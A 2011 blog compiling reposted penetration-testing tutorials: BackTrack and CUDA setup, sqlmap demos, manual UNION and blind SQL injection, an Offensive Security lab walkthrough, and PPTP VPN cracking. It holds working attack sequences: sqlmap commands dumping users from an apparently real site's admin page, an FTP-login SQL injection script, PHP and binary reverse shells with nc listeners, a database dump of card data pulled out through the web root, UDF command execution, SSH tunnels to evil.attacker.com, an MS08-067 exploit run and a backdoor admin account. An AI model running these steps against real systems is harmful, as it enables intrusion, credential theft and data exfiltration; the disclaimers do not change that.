Sunday, December 25, 2011

HOWTO : Android 4.0 (Galaxy Nexus) File Transfer on Ubuntu 11.10

This tutorial is not my work but OhHeyitsLou's. Please credit him.

Step by step tutorial

Youtube step by step tutorial

That's all! See you.

HOWTO : BackTrack 5 R1 on Intel X79 Express chipset and nVidia display card

Hardware

CPU : Intel i7-3930K (Socket 2011, 6 cores / 12 threads with HT)
Display card : 2 x nVidia GeForce GTX 590 (1024 CUDA cores per card)

Installation of BackTrack 5 R1

BackTrack 5 R1 boots on an Intel X79 Express chipset motherboard with two nVidia GeForce GTX 590 display cards, but "nomodeset" must be added to the boot options: press "Tab" on the boot menu and append it to the kernel line.

Install BackTrack 5 R1 as usual. When the installer asks you to reboot, leave the BackTrack 5 R1 CD in the drive and boot from it again (with "nomodeset" as before). Once the live system is up, mount the installed root partition and add "nomodeset" to the kernel line(s) of its /boot/grub/grub.cfg. Note that update-grub regenerates grub.cfg, so to keep the option across kernel updates also add it to GRUB_CMDLINE_LINUX_DEFAULT in /etc/default/grub.

After that, remove the CD and reboot. The system will boot into BackTrack 5 R1 without problem.
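The grub.cfg edit above can be scripted. The following is an added example and not part of the original tutorial: two functions that add "nomodeset" to the kernel lines of a GRUB 2 grub.cfg and to GRUB_CMDLINE_LINUX_DEFAULT in /etc/default/grub without duplicating the option on a second run. The grub.cfg and /etc/default/grub snippets it is checked against are constructed, and the /mnt paths in the usage stub assume the installed root has been mounted at /mnt as in the step above.

```python
import re

# Added example, not from the original post. GRUB 2 kernel lines in
# /boot/grub/grub.cfg look like:
#   linux   /boot/vmlinuz-2.6.39.4 root=UUID=... ro quiet splash
KERNEL_LINE = re.compile(r"^(\s*linux(?:16|efi)?\s+\S.*?)[ \t]*$")
CMDLINE_DEFAULT = re.compile(r'^GRUB_CMDLINE_LINUX_DEFAULT="(.*)"[ \t]*$', re.M)


def add_nomodeset(grub_cfg: str) -> str:
    """Append nomodeset to every kernel command line that lacks it.

    Running it twice is harmless: lines that already carry the option are
    left alone, and non-kernel lines (initrd, menuentry, ...) are untouched.
    """
    out = []
    for line in grub_cfg.splitlines(keepends=True):
        body = line.rstrip("\r\n")
        newline = line[len(body):]
        m = KERNEL_LINE.match(body)
        if m and "nomodeset" not in m.group(1).split():
            body = m.group(1) + " nomodeset"
        out.append(body + newline)
    return "".join(out)


def persist_nomodeset(default_grub: str) -> str:
    """Put nomodeset into GRUB_CMDLINE_LINUX_DEFAULT in /etc/default/grub.

    grub.cfg is regenerated by update-grub (for example on a kernel upgrade),
    so this is the setting that keeps the option across such regenerations.
    """
    m = CMDLINE_DEFAULT.search(default_grub)
    if m is None:
        sep = "" if (not default_grub or default_grub.endswith("\n")) else "\n"
        return default_grub + sep + 'GRUB_CMDLINE_LINUX_DEFAULT="nomodeset"\n'
    if "nomodeset" in m.group(1).split():
        return default_grub
    value = (m.group(1) + " nomodeset").strip()
    return (default_grub[: m.start()]
            + f'GRUB_CMDLINE_LINUX_DEFAULT="{value}"'
            + default_grub[m.end():])


if __name__ == "__main__":
    # Write patched copies next to the originals (installed root assumed at /mnt);
    # diff them against the originals before moving them into place.
    for path, patch in (("/mnt/boot/grub/grub.cfg", add_nomodeset),
                        ("/mnt/etc/default/grub", persist_nomodeset)):
        with open(path) as fh:
            patched = patch(fh.read())
        with open(path + ".nomodeset", "w") as fh:
            fh.write(patched)
```

After changing /etc/default/grub, run update-grub (from the installed system or a chroot) so the regenerated grub.cfg carries the option too.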

If the kernel is upgraded, rebuild the kernel headers with the following steps :

prepare-kernel-sources
cd /usr/src/linux
cp -rf include/generated/* include/linux/


Installation of nVidia display driver

Go to the nVidia Developer Zone CUDA Toolkit 4.0 page to download the following. Do not enter X11 by issuing "startx"; otherwise the driver installation will fail.

(1) Download "Developer Drivers for Linux (270.41.19)" for the nVidia Driver.

32-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_0/drivers/devdriver_4.0_linux_32_270.41.19.run

64-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_0/drivers/devdriver_4.0_linux_64_270.41.19.run

chmod +x devdriver_4.0_linux_xx_270.41.19.run
./devdriver_4.0_linux_xx_270.41.19.run


(2) Download "CUDA Toolkit for Ubuntu Linux 10.10" for the CUDA Toolkit. The two links below are nVidia's "thank you" landing pages, so wget saves an HTML page rather than the installer; download them in a browser, or fetch the path given in url= from developer.download.nvidia.com as with the driver and SDK.

32-bit :
wget http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0/toolkit/cudatoolkit_4.0.17_linux_32_ubuntu10.10.run

64-bit :
wget http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0/toolkit/cudatoolkit_4.0.17_linux_64_ubuntu10.10.run

chmod +x cudatoolkit_4.0.17_linux_xx_ubuntu10.10.run
./cudatoolkit_4.0.17_linux_xx_ubuntu10.10.run


(3) Download "GPU Computing SDK" for the nVidia SDK.

wget http://developer.download.nvidia.com/compute/cuda/4_0/sdk/gpucomputingsdk_4.0.17_linux.run

chmod +x gpucomputingsdk_4.0.17_linux.run
./gpucomputingsdk_4.0.17_linux.run


nano /root/.bashrc

Append the following :

export PATH=$PATH:/usr/local/cuda/bin
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda/lib:/usr/local/cuda/lib64


After that, reboot the system so that the nVidia driver takes effect.

Installation of pyrit

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
python setup.py install


tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
python setup.py install


To check that the installation works :

pyrit list_cores
pyrit benchmark
pyrit benchmark_long


That's all! See you.

Before water cooling



After water cooling

Friday, December 23, 2011

HOWTO : Ubuntu 12.04 LTS on Intel X79 Express Chipset and nVidia Display Card

At the time of writing, Ubuntu 12.04 LTS is still under heavy development, at the Alpha 1 stage.

Ubuntu 12.04 LTS boots on the Intel X79 Express chipset without trouble because it ships kernel 3.2.

If the system has an nVidia display card, you need to add "nomodeset" by pressing F6 on the boot menu of the Ubuntu 12.04 LTS Live CD. (To reach that menu, press Enter when the "keyboard" and "human" figures appear at the bottom of the screen during boot.)

That's all! See you.

Friday, September 16, 2011

HOWTO : SQL Injection with SQLmap on Back|Track 5 R1

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : ruo911

This is ruo911's work but not mine. I re-post it for educational purposes only.



Command

cd /pentest/web/scanners/sqlmap
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 --dbs
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -D pjirc_forum --tables
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users --columns
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users -U test --dump


Then try to log in with the dumped credentials.

P.S.
1. On BackTrack 5 R1, sqlmap lives in a different directory :
cd /pentest/database/sqlmap

2. User-agent option, for example :
--user-agent="Mozilla/5.0 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"

That's all! See you.

HOWTO : SQL Injection by tools

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : medmado1990

This is medmado1990's work but not mine. I re-post it for educational purposes only.





That's all! See you.

HOWTO : Blind SQL Injection

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : KFProdigy

This is KFProdigy's work but not mine. I re-post it for educational purposes only.





Hello everyone. In this tutorial I show you how to manually do an SQL injection into a vulnerable site. Also, at the beginning when I say "google dorks", I don't mean that people from Google are dorks; I mean actually go to Google and search "dork" or "dorks".
Basically it's something like "inurl:news.php?id=" or anything along those lines. I hope this helps!

For more tutorials and tools, check out http://sqliunderground.co.cc , I have a really in-depth tutorial on there.
P.S. This is for educational purposes only.


THE THINGS I PASTE
group_concat(table_name)

from information_schema.tables where table_schema=database()--

concat(column,0x3a,column) from table/*

An example would be
Example.com/index.php?id=-32 UNION SELECT 1,2,3,4,5,concat(username,0x3a,password) from adminlogin/*,7,8,9 from information_schema.columns where table_schema=database()--

That's all! See you.

Thursday, September 15, 2011

Official SQLMap video demo series

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Original link is here.

HOWTO : Official SQLMap video demonstration 1

HOWTO : Official SQLMap video demonstration 2

HOWTO : Official SQLMap video demonstration 3

HOWTO : Official SQLMap video demonstration 4

HOWTO : Official SQLMap video demonstration 5

HOWTO : Official SQLMap video demonstration 6

HOWTO : Official SQLMap video demonstration 7

HOWTO : Official SQLMap video demonstration 8

HOWTO : Official SQLMap video demonstration 9

HOWTO : Official SQLMap video demonstration 10

HOWTO : Official SQLMap video demonstration 11

HOWTO : Official SQLMap video demonstration 12

That's all! See you.

HOWTO : Official SQLMap video demonstration 12

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against an ASP test page hosted on a Microsoft Windows 2003 server with back-end database management system being Microsoft SQL Server 2005.

The tool is instructed to identify possible SQL injections, then exploit a database's stored procedure heap-based buffer overflow vulnerability (MS09-004) if it is Microsoft SQL Server 2000 or 2005. sqlmap relies on Metasploit to create the shellcode which gets executed upon successful exploitation of the buffer overflow on the database server and establishes the connection between the user's machine and the database server.

The control is passed over to the Metasploit command line interface where the user can proceed to escalate privileges to SYSTEM by exploiting the MS10-015 vulnerability with the Meterpreter getsystem command.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/mqsql/iis/get_int.asp?id=1 --os-bof -v 1 --msf-path ~/software/metasploit

That's all! See you.

HOWTO : Official SQLMap video demonstration 11

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being MySQL 5.1.

The tool is instructed to identify possible SQL injections and exploit them by spawning an out-of-band command prompt session between the user's machine and the database server. When the back-end database is MySQL, ASP and PHP languages do not support stacked queries (ASP.NET does though): there is no way to inject different SQL statements in the same HTTP request.

As a result, sqlmap uploads a web shell in a writable directory within the web server document root and uses it to execute the Metasploit payload stager previously created. The out-of-band command prompt session is now established and the control is passed over to the Metasploit command line interface.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/mqsql/get_int.php?id=1 --os-pwn --msf-path /home/inquis/software/metasploit -v 1

That's all! See you.

HOWTO : Official SQLMap video demonstration 10

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against an ASP.NET test page hosted on a Microsoft Windows 2003 server with back-end database management system being PostgreSQL 8.4.

The tool is instructed to identify possible SQL injections and exploit them by spawning an out-of-band Meterpreter session between the user's machine and the database server then escalating database process' user privileges to SYSTEM. sqlmap first uploads a dynamic-linked library (DLL) used afterwards to create two user-defined functions (sys_exec() and sys_bineval()) in the database.

Then it asks the user for options to create the Metasploit shellcode and executes it in-memory within the database process via the injected sys_bineval() user-defined function.

The out-of-band Meterpreter session is now established and the control is passed over to the Metasploit command line interface where the user can enjoy a SYSTEM shell on the database server.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/iis/get_int_84.aspx?id=1 --os-pwn --msf-path /home/inquis/software/metasploit --priv-esc -v 1

That's all! See you.

HOWTO : Official SQLMap video demonstration 9

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap command execution features: sqlmap is launched against an ASP.NET test page hosted on a Microsoft Windows 2003 server with back-end database management system being MySQL 5.0.

The tool is instructed to identify possible SQL injections and exploit them by spawning an interactive command prompt where the user can execute commands on the database server operating system. sqlmap first uploads a dynamic-linked library (DLL) used to create two user-defined functions (sys_exec() and sys_eval()) in the database then shows the command prompt.

For each command the user can choose if he wants to retrieve the command standard output or, alternatively, automatically retrieve the output for all commands. If the answer is positive (y or a), sqlmap executes the command once and stores its standard output in a support table.

Either boolean-based blind SQL injection or UNION query SQL injection technique is used to dump the entry of this table and delete it afterwards.

This technique is also implemented for PostgreSQL. On Microsoft SQL Server, xp_cmdshell extended stored procedure is used to execute commands on the underlying operating system.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/mysql/iis/get_int_50.aspx?id=1 --os-shell -v 1 --union-use

That's all! See you.

HOWTO : Official SQLMap video demonstration 8

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap command execution features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being PostgreSQL 8.4.

The tool is instructed to identify possible SQL injections and exploit them by executing a command on the database server operating system. sqlmap first uploads a dynamic-linked library (DLL) used to create two user-defined functions (sys_exec() and sys_eval()) in the database. Then it asks the user if he wants to retrieve the command standard output.

If the answer is positive, sqlmap executes the command once and stores its standard output in a support table. Either boolean-based blind SQL injection or UNION query SQL injection technique is used to dump the entry of this table and delete it afterwards. This technique is also implemented for MySQL.

On Microsoft SQL Server, xp_cmdshell extended stored procedure is used to execute commands on the underlying operating system.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int.8.4.php?id=1 --os-cmd "id" -v 1

That's all! See you.

HOWTO : Official SQLMap video demonstration 7

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap file system write access features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being PostgreSQL 8.3.

The tool is instructed to identify possible SQL injections and exploit them by uploading a local file to the database server file system. sqlmap encodes the local file in base64, inserts it into a temporary support table, then abuses the PostgreSQL Large Object functions to export it to a file on the underlying file system.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1 --write-file /etc/passwd --dest-file /tmp/writetest -v 2

That's all! See you.

HOWTO : Official SQLMap video demonstration 6

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap file system read access features: sqlmap is launched against an ASP test page hosted on a Microsoft Windows 2003 server with back-end database management system being Microsoft SQL Server 2005.

The tool is instructed to identify possible SQL injections and exploit them by retrieving a file from the database server file system. The file is stored locally on the user's machine and can be either a text or a binary file.

The technique used to dump this data from the back-end database software is the default, boolean-based blind SQL injection.

Command

python sqlmap.py -u http://172.16.213.131/mssql/iis/get_int.asp?id=1 --read-file "C:\example.txt" -v 2

That's all! See you.

HOWTO : Official SQLMap video demonstration 5

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap custom enumeration features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being Oracle 10.2 Enterprise Edition.

The tool is instructed to identify possible SQL injections and exploit them by spawning a SQL shell where it is possible to provide custom SQL statements to be executed on the back-end database management system. sqlmap analyzes the provided SQL statement, decides which technique to use to execute it and proceeds accordingly.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/oracle/get_int.php?id=1 --sql-shell -v 2

That's all! See you.

HOWTO : Official SQLMap video demonstration 4

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap in-depth enumeration features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being PostgreSQL 8.4.

The tool is instructed to identify possible SQL injections and exploit them by enumerating and dumping entries of all databases' tables containing one or more of the columns specified by the user. sqlmap always stores dumped entries in a local CSV file upon successful dump.

The technique used to dump this data from the back-end database software is the default, boolean-based blind SQL injection.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int8.4.php?id=1 --dump -C 'user,pass' -v 1 --exclude-sysdbs

That's all! See you.

HOWTO : Official SQLMap video demonstration 3

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap options' granularity with verbose output: sqlmap is launched against an ASP test page hosted on a Microsoft Windows 2003 server with back-end database management system being Microsoft SQL Server 2005.

The tool is instructed to identify possible SQL injections and exploit them by dumping only from the second to the third entry of column surname of table users in the database testdb.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther --dump -T users -C surname -D testdb --start 2 --stop 3 -v 2

That's all! See you.

HOWTO : Official SQLMap video demonstration 2

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap enumeration features with verbose output: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being Oracle 10.2 Enterprise Edition.

The tool is instructed to identify possible SQL injections, check if they are also exploitable via UNION query SQL injection technique, then enumerate the banner and the session user's password hash(es).

The technique used to dump this data from the back-end database software is specified by the user as UNION query SQL injection. If the parameter was not affected by UNION query SQL injection, sqlmap would have fallen back to the default technique, boolean-based blind SQL injection.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/oracle/get_init.php?id=1 -b --passwords -U CU --union-use -v 2

That's all! See you.

HOWTO : Official SQLMap video demonstration 1

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap database fingerprint and enumeration features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being MySQL 5.1.

The tool is instructed to identify possible SQL injections and exploit them by extensively fingerprinting the back-end database management system, then enumerate the banner, the session user, the current database, the database's users, users' password hashes and available databases.

The technique used to dump this data from the back-end database software is the default, boolean-based blind SQL injection.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/mysql/get_init.php?id=1 -f -b --current-user --current-db --users --passwords --dbs -v 0

That's all! See you.
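Across these twelve demonstrations the phrase "the default, boolean-based blind SQL injection" keeps coming back, and the manual tutorial reposted further up builds a UNION payload by hand. The following added example, which is mine and not code from sqlmap, Bernardo or the other reposted authors, puts both techniques side by side against a deliberately vulnerable query over an in-memory SQLite database with constructed rows, and shows the parameterized form of the same query that neither payload gets through. SQLite syntax stands in for MySQL's: || in place of concat() and the 0x3a literal, and unicode()/substr() for the character probes.

```python
import sqlite3

# Added example; not code from sqlmap or from any of the reposted tutorials.
# Constructed sample rows standing in for the "adminlogin"/"users" tables the
# tutorials dump. The password column holds MD5 hashes, as such tables often do.
ADMIN_ROWS = [
    ("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    ("editor", "e10adc3949ba59abbe56e057f20f883e"),
]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT, body TEXT);"
        "INSERT INTO news VALUES (1, 'Welcome', 'first post'), (2, 'Update', 'second post');"
        "CREATE TABLE adminlogin(username TEXT, password TEXT);"
    )
    db.executemany("INSERT INTO adminlogin VALUES (?, ?)", ADMIN_ROWS)
    return db


def news_vulnerable(db, id_param: str):
    """The news.php?id= pattern: the parameter is spliced into the SQL text."""
    return db.execute(f"SELECT id, title, body FROM news WHERE id = {id_param}").fetchall()


def news_safe(db, id_param: str):
    """Same query with a bound parameter: the input can only ever be a value."""
    return db.execute("SELECT id, title, body FROM news WHERE id = ?", (id_param,)).fetchall()


# UNION-based dump, the SQLite spelling of
#   -32 UNION SELECT 1,2,3,4,5,concat(username,0x3a,password) from adminlogin
# (SQLite concatenates with || and has no 0x3a hex literal). The column count
# must match the original SELECT, here three.
UNION_PAYLOAD = "-1 UNION SELECT 1, username || ':' || password, 3 FROM adminlogin"


def union_dump(db):
    """Credentials come straight back in the page body, one per row."""
    return [row[1] for row in news_vulnerable(db, UNION_PAYLOAD)]


def blind_oracle(db, condition: str) -> bool:
    """Boolean oracle: is row 1 still shown when `condition` is ANDed onto it?
    Nothing from the database reaches the page, only the true/false difference."""
    return bool(news_vulnerable(db, f"1 AND ({condition})"))


def blind_extract(db, expr: str, max_len: int = 64) -> str:
    """Recover the result of `expr` character by character with a binary search
    over the code point, which is what boolean-based blind injection amounts to:
    about seven requests per character plus one per position for the length check."""
    out = []
    for pos in range(1, max_len + 1):
        if not blind_oracle(db, f"length(({expr})) >= {pos}"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if blind_oracle(db, f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    db = make_db()
    print("UNION dump:", union_dump(db))
    print("blind dump:", blind_extract(db, "SELECT password FROM adminlogin WHERE username='admin'"))
    print("same payload against the bound parameter:", news_safe(db, UNION_PAYLOAD))
```

The UNION route needs a column in the result to be echoed on the page; the blind route needs only a visible difference between a true and a false page, which is why sqlmap can fall back to it when the UNION test fails.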

Monday, September 12, 2011

HOWTO : Penetration Testing in the Real World

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : muts (of Offensive Security)

This is muts's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Penetration Testing in the Real World from Offensive Security on Vimeo.


ftp-brute.py

#!/usr/bin/python
# Walks the ftpuser table one row at a time through the SQL injection in the
# FTP login: each iteration authenticates as the i-th row returned by the UNION
# and lists that account's home directory.
from ftplib import FTP

print("Attempting user directory discovery via FTP")
for i in range(0, 6):
    # LIMIT i,1 picks a single ftpuser row per login attempt
    username = "%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT " + str(i) + ",1; --  "
    password = "1"
    ftp = FTP('www.offseclabs.com')
    ftp.login(username, password)
    print("Logged in as user " + str(i) + ",1")
    ftp.retrlines('LIST')
    ftp.close()


Commands


Open Terminal A :

nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear

ftp www.offseclabs.com
username - bob
password - bob
(To enumerate the ftp server)

ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --  
password - 1

(logged in to the ftp server)
pwd
ls
bye

clear

cd core
clear
nano brute.py --> (see above ftp-brute.py)
./brute.py
(find the row whose home directory is mapped to the web server's document root; here it is the one at LIMIT 5,1)
clear

ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --  
password - 1

(logged in as the fifth user)
ls
put rs.php --> (a reverse php shell)

-----------------------
Open Terminal B :

nc -lvp 80

-----------------------
Open Terminal C :

wget www.offseclabs.com/rs.php

(Then, at Terminal B, we got a reverse shell)

-----------------------
Go back to Terminal B :
(inside the reverse shell)

/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)

mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt

------------------------
Open a Firefox :

www.offseclabs.com/images/ccdump.txt
(we got the database dump)

-------------------------
Go back to Terminal A :

(inside the ftp server)
put up.html --> (the HTML upload form)
put up.php --> (the PHP upload handler)

-------------------------
Open Firefox :

www.offseclabs.com/up.html

(upload lib_mysqludf_sys.so and mark it with title 1)
(upload rs, a binary reverse shell, and mark it with title 2)

** Details of lib_mysqludf_sys.so

---------------------------
Go back to Terminal A :

(quit the ftp server)
bye
clear
exit
(quit Terminal A)

----------------------------
Go back to Terminal B :

mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/bd';

CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';

SELECT sys_eval('chmod 755 /tmp/bd');
SELECT sys_eval('/tmp/bd &');
(don't press Enter at this moment)

---------------------------
Open Terminal D :

nc -lvp 80

(go back to Terminal B and press Enter; you will get a reverse shell at Terminal D)

----------------------------
Open Terminal E :

nc -lvp 80

----------------------------
Go back to Terminal B :

(inside the MySQL server)
SELECT sys_eval('/tmp/bd &');

(press enter and we got another reverse shell at Terminal E)

---------------------------
Go back to Terminal E :

(inside the reverse shell)
ping -c 1 10.150.0.20
clear

ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)

-----------------------------
Open Terminal F :

netstat -antp
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse

-----------------------------
Go back to Terminal D :

ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)

clear

------------------------------
Go back to Terminal F :

cd core
nano nx.py --> (a ms08-067 python exploit for win2k3 sp2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444

(we got a remote shell of 10.150.0.20)
ipconfig
net user hacker hacker /add
net localgroup administrators hacker /add

---------------------------------
Go back to Terminal D :

(quit the tunnel)
exit
clear

ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear

-----------------------------------
Open Terminal G :

netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1

(login to the 10.150.0.20 with username - hacker and password - hacker)


That's all! See you.

g0tmi1k's Video Series

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

The following are my collections :

HOWTO : Cracking PPTP VPNs with asleap and THC-pptp-bruter

HOWTO : De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}

HOWTO : De-ICE.net v1.1 (1.110) {Level 1 - Disk 2}

HOWTO : De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}

HOWTO : pWnOS

HOWTO : De-ICE.net v1.2a (1.20a) {Level 1-Disk 3-Version A}

HOWTO : De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

HOWTO : Kioptrix - Level 1

HOWTO : Kioptrix - Level 1.1

HOWTO : Kioptrix - Level 1.2

HOWTO : Holynix - Level 1

HOWTO : Holynix - Level 2

That's all! See you.

HOWTO : Cracking PPTP VPNs with asleap and THC-pptp-bruter

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

The original post is here.

Links

Watch on-line
Download Video
Script (chap2asleap.py)

What is this?

A python script, to automatically generate the arguments for Joshua Wright's 'asleap' program.

This video demonstrates an offline (asleap) and online (THC-pptp-bruter) attack on an MSCHAP v2 software VPN.

How does this work?

From Wireshark (and a Man In The Middle attack), you can get the "CHAP Challenge" and "CHAP Response". We can break these values down:

CHAP Challenge = Auth Challenge (16 bytes)
CHAP Response = Peer Challenge (16 bytes) and Peer Response (24 bytes)

After finding the "Auth Challenge" and "Peer Challenge", we can add these to the username and hash (SHA1) the result. This will generate the "Challenge".

Once we have the challenge, we can feed this into asleap, along with the CHAP Challenge.

This script does all the work for you (and more); it just needs the values from Wireshark for it to work. As well as having the option for different styles of attack, you can either use a dictionary/wordlist or use 'Genkeys' to generate a look-up file for asleap (which is recommended). Also, by using this, you can automatically run asleap with your arguments.

What do I need?

asleap
Python
The script - chap2asleap.py
Wireshark
VPN
THC-pptp-bruter

Software
Name: asleap
Version: 2.2
Home Page: http://www.willhackforsushi.com/Asleap.html
Download Link: http://www.willhackforsushi.com/code/asleap/2.2/asleap-2.2.tgz

Name: THC-pptp-bruter
Version: 0.1.4
Home Page: http://freeworld.thc.org
Download Link: http://freeworld.thc.org/download.php?t=r&f=thc-pptp-bruter-0.1.4.tar.gz

Name: chap2asleap.py
Version: 0.1.1
Home Page: http://g0tmi1k.blogspot.com
Download Link: http://www.mediafire.com/?wnkoyiai2ty

How to use chap2asleap.py:
1.) chmod 755 chap2asleap.py
2.) python chap2asleap.py

Commands

